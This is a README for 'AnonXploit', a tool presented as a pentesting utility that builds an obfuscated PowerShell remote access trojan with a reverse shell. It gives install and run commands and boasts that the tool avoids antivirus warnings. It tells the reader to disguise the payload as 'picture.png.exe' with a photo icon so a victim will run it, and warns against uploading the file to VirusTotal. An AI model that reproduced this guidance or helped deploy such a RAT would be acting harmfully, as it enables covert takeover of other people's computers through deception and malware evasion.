AnonXploit is a pentesting tool, that create a Powershell RAT. It can be used by organizations of all sizes, including individuals.
It was developed with the purpose of exploiting the vulnerability of creating a reverse shell between the pentester and the injected computer. This tool can work without warnings about viruses and suspicious connections.
sudo apt update
sudo apt install -y git
git clone https://github.com/gsociety0/AnonXploit.git
bash ./install
pkg update
pkg upgrade -y
pkg install -y git
pkg install -y python python-pip
git clone https://github.com/gsociety0/AnonXploit.git
bash ./install
To create the RAT you need to run two programs, client.py and server.py. Where the client will automatically create the RAT, and the server will wait for the connection.
python3 client.py
python3 server.py
(Ethically speaking) You need the other person to perform the RAT, for this, you can use Social Engineering (S.E) techniques. One of the ways that can be used is to convert this file into an Executable (.EXE), name it "picture.png.exe", define an icon of a photograph and send it to the person, making it appear that it is a photograph. Now, you study the situation and act in the best way possible.
If you check the source code of the two main files (client.py/server.py) of AnonXploit file, you will notice that the code is obfuscated. This is done for security reasons and compatibility with WSL (Windows Subsystem for Linux), where the antivirus detected the files as viruses and deleted them.
DON'T UPLOAD THE RAT FILE TO VIRUS TOTAL!